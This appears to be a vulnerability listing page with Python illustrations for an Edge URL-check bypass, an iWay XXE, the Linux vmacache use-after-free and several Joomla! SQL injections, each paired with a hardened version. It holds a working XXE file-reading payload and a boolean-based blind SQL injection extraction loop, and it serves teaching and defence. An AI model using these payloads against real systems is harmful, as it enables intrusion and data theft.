Explore Vulnerabilities

Explore all Exploits:

Content process -> Privileged content process (first_stage.js)

When Edge spawns a new content process, the process's privilege level is determined from the URL it will load. That check is implemented by LCIEUrlPolicy::GetPICForPrivilegedInternalPage in eModel.dll, which calls several other methods to classify the URL. One of them, EdgeUrlUtils::IsAboutFlagsResUri, is vulnerable: it only checks the scheme and whether the URL ends with "/edgehtml.dll/flags.htm", so the URL given in the original report, which executes arbitrary JavaScript, is also judged to require a privileged content process. Because a navigation to the "res" scheme cannot be triggered from JavaScript, an additional renderer exploit is required; I used issue 1588 for it.
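As an added illustration (not code from the report and not Edge's own implementation), the following Python models the two ways such a check can be written: the scheme-plus-suffix test the entry describes, and a strict comparison of every URL component. The sample URLs are constructed for this example; the bypass URL used in the actual report is not reproduced on this page and none of these strings is it.

```python
from urllib.parse import urlsplit

# Suffix the entry says EdgeUrlUtils::IsAboutFlagsResUri tests for.
FLAGS_SUFFIX = "/edgehtml.dll/flags.htm"
RES_SCHEME = "res"


def is_about_flags_res_uri_weak(url: str) -> bool:
    """Model of the check as described: scheme plus a suffix test.

    Anything whose text ends in FLAGS_SUFFIX passes, regardless of which
    module, path, query or fragment the URL actually names.
    """
    parts = urlsplit(url)
    return parts.scheme == RES_SCHEME and url.lower().endswith(FLAGS_SUFFIX)


def is_about_flags_res_uri_strict(url: str) -> bool:
    """Hardened form (hypothetical, not Edge's code): compare every component.

    The URL must be res://edgehtml.dll/flags.htm after case folding, with no
    extra path segments, query string or fragment.
    """
    parts = urlsplit(url)
    return (
        parts.scheme == RES_SCHEME
        and parts.netloc.lower() == "edgehtml.dll"
        and parts.path.lower() == "/flags.htm"
        and parts.query == ""
        and parts.fragment == ""
    )


# Constructed inputs: the genuine about:flags resource, then look-alikes that
# merely end in the suffix. None of them is the URL from the original report.
SAMPLE_URLS = {
    "res://edgehtml.dll/flags.htm": True,
    "res://other.dll/edgehtml.dll/flags.htm": False,                 # different module
    "res://edgehtml.dll/flags.htm?r=/edgehtml.dll/flags.htm": False,  # suffix in query
    "http://example.invalid/edgehtml.dll/flags.htm": False,          # wrong scheme
}


def compare_checks(urls=SAMPLE_URLS):
    """Return {url: (weak_result, strict_result, expected)} for each sample."""
    return {
        url: (is_about_flags_res_uri_weak(url),
              is_about_flags_res_uri_strict(url),
              expected)
        for url, expected in urls.items()
    }


if __name__ == "__main__":
    for url, (weak, strict, expected) in compare_checks().items():
        note = "" if weak == expected else "   <-- suffix check misclassifies"
        print(f"{url}\n  weak={weak} strict={strict} expected={expected}{note}")
```

The strict variant rejects the two look-alikes because it compares the module and path individually rather than the tail of the string; a query or fragment whose text happens to end in the suffix cannot satisfy it.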

iWay Data Quality Suite Web Console 10.6.1.ga-2016-11-20 – XML External Entity Injection

iWay Data Quality Suite Web Console exposes web services. Because the product performs no validation of user-supplied input when processing those web services, an attacker can inject external entities into the SOAP request (XML External Entity injection) and escalate this to remote code execution on the server.
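An added example, not the advisory's code: a constructed SOAP request carrying an external entity, parsed with Python's xml.sax once with external general entities enabled (the weak parser configuration) and once with the default, hardened setting. The service name, parameter and secret file are placeholders invented for the example, and the request is parsed locally rather than sent to any product.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class BodyTextCollector(xml.sax.ContentHandler):
    """Collect the character data the parser reports, as a SOAP endpoint
    would when reading request parameters."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks)


def build_xxe_soap_request(target_path: str) -> bytes:
    """Constructed SOAP envelope whose external entity points at a local file.
    The operation name and parameter are placeholders."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "file://{target_path}">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <lookupRecord xmlns="urn:example:dq">
      <recordId>&xxe;</recordId>
    </lookupRecord>
  </soapenv:Body>
</soapenv:Envelope>
""".encode()


def parse_soap_request(raw: bytes, resolve_external_entities: bool) -> str:
    """Parse a SOAP request and return the text the service would see.

    resolve_external_entities=True models a parser that fetches external
    general entities (the weak setting); False is the hardened setting, which
    is also xml.sax's default since Python 3.7.1.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = BodyTextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(raw))
    return handler.text().strip()


def demo():
    """Write a constructed secret file, then parse the same request with both
    configurations. Returns (leaked_text, hardened_text)."""
    with tempfile.NamedTemporaryFile("w", suffix=".properties", delete=False) as f:
        f.write("db.password=constructed-secret-value")   # constructed secret
        secret_path = f.name
    try:
        request = build_xxe_soap_request(secret_path)
        leaked = parse_soap_request(request, resolve_external_entities=True)
        hardened = parse_soap_request(request, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("external entities resolved:", repr(leaked))
    print("external entities disabled:", repr(hardened))
```

With entity resolution on, the file's contents arrive in the request parameter exactly as if the client had typed them; with it off, the reference is skipped and the parameter is empty. Whatever parser the product uses, the fix is the same: disable DTD processing or external entity resolution before parsing untrusted SOAP.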

VMA Cache Use-After-Free Vulnerability

Since commit 615d6e8756c8 ("mm: per-thread vma caching", first in 3.15), Linux has per-task VMA caches that contain up to four VMA pointers for fast lookup. VMA caches are invalidated by bumping the 32-bit per-mm sequence number mm->vmacache_seqnum; when the sequence number wraps, vmacache_flush_all() scans through all running tasks and wipes the VMA caches of all tasks that share current's mm. In commit 6b4ebc3a9078 ("mm,vmacache: optimize overflow system-wide flushing", first in 3.16), a bogus fastpath was added that skips the invalidation on overflow if current->mm->mm_users==1. This means that the following sequence of events triggers a use-after-free:

[A starts as a single-threaded process]
A: create mappings X and Y (in separate memory areas far away from other allocations)
A: perform repeated invalidations until current->mm->vmacache_seqnum==0xffffffff and current->vmacache.seqnum==0xfffffffe
A: dereference an address in mapping Y that is not paged in (thereby populating A's VMA cache with Y at seqnum 0xffffffff)
A: unmap mapping X (thereby bumping current->mm->vmacache_seqnum to 0)
A: without any more find_vma() calls (which could happen e.g. via pagefaults), create a thread B
B: perform repeated invalidations until current->mm->vmacache_seqnum==0xfffffffe
B: unmap mapping Y (thereby bumping current->mm->vmacache_seqnum to 0xffffffff)
A: dereference an address in the freed mapping Y (or any address that isn't present in the pagetables and doesn't correspond to a valid VMA cache entry)
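An added userspace model (Python; not kernel code and not the report's proof of concept) that replays the sequence above against the vmacache logic as the entry describes it: a 32-bit per-mm seqnum, per-task caches that resync and flush on mismatch, and vmacache_flush_all() with or without the mm_users==1 fastpath. The "repeated invalidations until" steps are collapsed into a single seqnum assignment, which is valid here because none of those steps crosses zero. Mapping names and addresses are constructed.

```python
from dataclasses import dataclass, field

U32_MASK, VMACACHE_SIZE, PAGE_SHIFT = 0xFFFFFFFF, 4, 12


@dataclass
class Vma:                      # stand-in for struct vm_area_struct
    name: str
    vm_start: int
    vm_end: int
    freed: bool = False         # set where a real kernel would free the object


@dataclass
class Mm:                       # stand-in for struct mm_struct
    vmas: list = field(default_factory=list)
    vmacache_seqnum: int = 0    # 32-bit in the affected kernels
    mm_users: int = 1


@dataclass
class Task:                     # stand-in for struct task_struct
    name: str
    mm: Mm
    vmacache_seqnum: int = 0
    vmacache: list = field(default_factory=lambda: [None] * VMACACHE_SIZE)


class KernelModel:
    def __init__(self, buggy_fastpath: bool):
        self.buggy_fastpath = buggy_fastpath   # True = behaviour after 6b4ebc3a9078
        self.tasks = []

    def vmacache_flush_all(self, mm: Mm):
        # Overflow handler: wipe the cache of every task sharing mm ...
        if self.buggy_fastpath and mm.mm_users == 1:
            return                              # ... unless the bogus fastpath fires
        for t in self.tasks:
            if t.mm is mm:
                t.vmacache = [None] * VMACACHE_SIZE

    def vmacache_invalidate(self, mm: Mm):
        mm.vmacache_seqnum = (mm.vmacache_seqnum + 1) & U32_MASK
        if mm.vmacache_seqnum == 0:             # 32-bit wrap
            self.vmacache_flush_all(mm)

    def invalidate_until(self, mm: Mm, target: int):
        # "Repeated invalidations until seqnum == target" in one step; only
        # valid while the bumps do not pass through 0 (true for every use below).
        assert mm.vmacache_seqnum <= target <= U32_MASK
        mm.vmacache_seqnum = target

    def vmacache_valid(self, task: Task) -> bool:
        # On seqnum mismatch the task resyncs and flushes only its own cache.
        if task.mm.vmacache_seqnum != task.vmacache_seqnum:
            task.vmacache_seqnum = task.mm.vmacache_seqnum
            task.vmacache = [None] * VMACACHE_SIZE
            return False
        return True

    def find_vma(self, task: Task, addr: int):
        # find_vma(): vmacache_find() first, then rb-tree walk + vmacache_update().
        if self.vmacache_valid(task):
            for vma in task.vmacache:
                if vma is not None and vma.freed:   # kernel reads vm_start from freed memory
                    raise RuntimeError(f"{task.name}: use-after-free of VMA {vma.name}")
                if vma is not None and vma.vm_start <= addr < vma.vm_end:
                    return vma
        for cand in task.mm.vmas:
            if cand.vm_start <= addr < cand.vm_end:
                task.vmacache[(addr >> PAGE_SHIFT) & (VMACACHE_SIZE - 1)] = cand
                return cand
        return None

    def munmap(self, task: Task, vma: Vma):
        task.mm.vmas.remove(vma)
        vma.freed = True
        self.vmacache_invalidate(task.mm)


def run_scenario(buggy_fastpath: bool) -> str:
    """Replay the sequence: 'uaf' if A's last lookup touches freed Y, else 'clean'."""
    k = KernelModel(buggy_fastpath)
    mm = Mm()
    a = Task("A", mm)
    k.tasks.append(a)
    x = Vma("X", 0x10000000, 0x10001000)     # constructed addresses
    y = Vma("Y", 0x20000000, 0x20001000)
    mm.vmas += [x, y]
    k.invalidate_until(mm, 0xFFFFFFFE)
    k.find_vma(a, x.vm_start)                # A resyncs: vmacache.seqnum = 0xfffffffe
    k.invalidate_until(mm, 0xFFFFFFFF)
    k.find_vma(a, y.vm_start)                # fault in Y: Y cached at seqnum 0xffffffff
    k.munmap(a, x)                           # seqnum wraps to 0; flush skipped if buggy
    mm.mm_users += 1                         # create thread B: mm_users == 2
    b = Task("B", mm)
    k.tasks.append(b)
    k.invalidate_until(mm, 0xFFFFFFFE)
    k.munmap(b, y)                           # seqnum 0xffffffff again; Y is freed
    try:
        k.find_vma(a, y.vm_start)            # A's stale entry now passes vmacache_valid()
    except RuntimeError:
        return "uaf"
    return "clean"
```

With the fastpath in place, A's cache survives the wrap to 0 while still tagged 0xffffffff, so when B's unmap of Y brings the mm seqnum back to 0xffffffff the stale pointer to Y passes vmacache_valid() and is dereferenced. Without the fastpath the wrap flushes A's cache and the final lookup misses cleanly.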

Faleemi Desktop Software 1.8.2 – ‘Device alias’ Local Buffer Overflow (SEH)

A buffer overflow exists in Faleemi Desktop Software 1.8.2 when an overly long string is entered into the 'Device alias' field. The published exploit is a Python script that writes the malicious payload to a file named 'exploit.txt'; the attacker then copies the contents of 'exploit.txt' into the 'Device alias' field and clicks 'Search'. The overflow overwrites the SEH chain, and in the proof of concept this results in a calculator pop-up.

Joomla! Component Responsive Portfolio 1.6.1 – ‘filter_order_Dir’ SQL Injection

The 'filter_order_Dir' parameter is used in SQL queries without sanitization, so an attacker can execute SQL commands through it. An authorized user with access to the filtering feature can use this to read the entire database or other server information. The 'filter_type_id', 'filter_pid_id' and 'filter_search' parameters are affected in the same way. Both boolean-based blind and error-based payloads work.

Joomla! Component Timetable Schedule 3.6.8 – SQL Injection

Joomla! Component Timetable Schedule 3.6.8 contains a SQL injection flaw in the 'eid' parameter of the 'index.php' script. An attacker can exploit it by sending a request with malicious SQL in that parameter, which can expose sensitive information from the database.

Joomla! Component Article Factory Manager 4.3.9 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Article Factory Manager 4.3.9. An attacker can send malicious SQL in the 'filter_search' parameter of the 'index.php' script to execute arbitrary SQL commands with the privileges of the application's database account.

Joomla! Component AlphaIndex Dictionaries 1.0 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component AlphaIndex Dictionaries 1.0. The 'letter' parameter of the 'index.php?option=com_aindexdictionaries&task=getArticlesPreview' POST request is used in SQL queries without sanitization, so a specially crafted POST request can inject arbitrary SQL code and execute it in the back-end database.

Joomla! Component Reverse Auction Factory 4.3.8 – SQL Injection

Joomla! Component Reverse Auction Factory 4.3.8 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'filter_order_Dir', 'cat' and 'filter_letter' parameters in the 'index.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation of this vulnerability may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
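The five Joomla! entries above describe the same defect, so one added example covers them all. It is Python against an in-memory sqlite3 table constructed for the example, not the components' PHP or a MySQL database: a handler that splices 'eid' and 'filter_order_Dir' into its query, a boolean-based blind extraction driven through 'eid' (the oracle is simply whether a row comes back), and a hardened handler that binds the value and allow-lists the sort direction. Table names, columns and the stored hash are placeholders.

```python
import sqlite3

ALLOWED_ORDER_DIR = {"ASC", "DESC"}
CHARSET = "$./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the component's tables (sqlite3 in memory)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE portfolio (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO portfolio VALUES (1, 'Alpha'), (2, 'Beta'), (3, 'Gamma');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$constructedHashValue');
    """)
    return db


def list_items_vulnerable(db, filter_order_dir: str, eid: str):
    """Models the vulnerable pattern: both request parameters are spliced into
    the SQL text, so whether any row comes back depends on whatever condition
    the attacker appends to eid."""
    sql = (f"SELECT id, title FROM portfolio WHERE id = {eid} "
           f"ORDER BY title {filter_order_dir}")
    return db.execute(sql).fetchall()


def list_items_hardened(db, filter_order_dir: str, eid: str):
    """The value is bound as a parameter; the ORDER BY direction cannot be
    bound, so it is checked against an allow-list instead."""
    direction = filter_order_dir.strip().upper()
    if direction not in ALLOWED_ORDER_DIR:
        raise ValueError("filter_order_Dir must be ASC or DESC")
    if not eid.isdigit():
        raise ValueError("eid must be a positive integer")
    sql = f"SELECT id, title FROM portfolio WHERE id = ? ORDER BY title {direction}"
    return db.execute(sql, (int(eid),)).fetchall()


def blind_extract(db, query_fn, length: int) -> str:
    """Boolean-based blind extraction of users.password through eid.
    The oracle is 'did the query return a row'. The hardened handler rejects
    the probe outright, so nothing is learned from it."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            probe = (f"1 AND substr((SELECT password FROM users WHERE id = 1),"
                     f"{pos},1) = '{ch}'")
            try:
                hit = bool(query_fn(db, "ASC", probe))
            except ValueError:
                return recovered          # hardened handler refused the probe
            if hit:
                recovered += ch
                break
        else:
            break                         # character outside CHARSET: stop
    return recovered


def demo():
    db = make_db()
    leaked = blind_extract(db, list_items_vulnerable, 10)
    safe = blind_extract(db, list_items_hardened, 10)
    rows = list_items_hardened(db, "desc", "2")   # legitimate use still works
    return leaked, safe, rows


if __name__ == "__main__":
    leaked, safe, rows = demo()
    print("vulnerable handler leaked:", leaked)
    print("hardened handler leaked  :", repr(safe))
    print("hardened, legit request  :", rows)
```

The same probe works against any of the named parameters that end up inside a WHERE clause; 'filter_order_Dir' is the awkward one for defenders because a sort direction cannot be passed as a bound parameter, which is why the hardened handler compares it against a fixed set of values rather than trying to escape it.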
